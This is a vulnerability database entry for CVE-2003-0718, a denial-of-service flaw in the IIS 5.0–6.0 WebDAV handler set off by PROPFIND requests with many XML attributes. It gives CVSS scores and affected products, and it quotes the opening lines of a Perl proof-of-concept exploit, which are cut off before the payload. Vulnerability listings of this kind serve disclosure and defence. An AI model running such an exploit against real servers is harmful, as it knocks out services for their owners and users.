5
CVSSv2

CVE-2003-0718

Published: 03/11/2004 Updated: 23/11/2020
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

The WebDAV Message Handler for Internet Information Services (IIS) 5.0, 5.1, and 6.0 allows remote malicious users to cause a denial of service (memory and CPU exhaustion, application crash) via a PROPFIND request with an XML message containing XML elements with a large number of attributes.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft internet information server 6.0

microsoft internet information services 5.0

Exploits

#!/usr/bin/perl # IIS BlowOut # POC exploit for MS04-030 Found by Amit Klein # incognito_ergo yahoo com # usage: perl ms04-030_splpl host port use IO::Socket; $port = @ARGV[1]; $host = @ARGV[0]; $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP"); for ($count=1; $count<9999; $count++) #more ...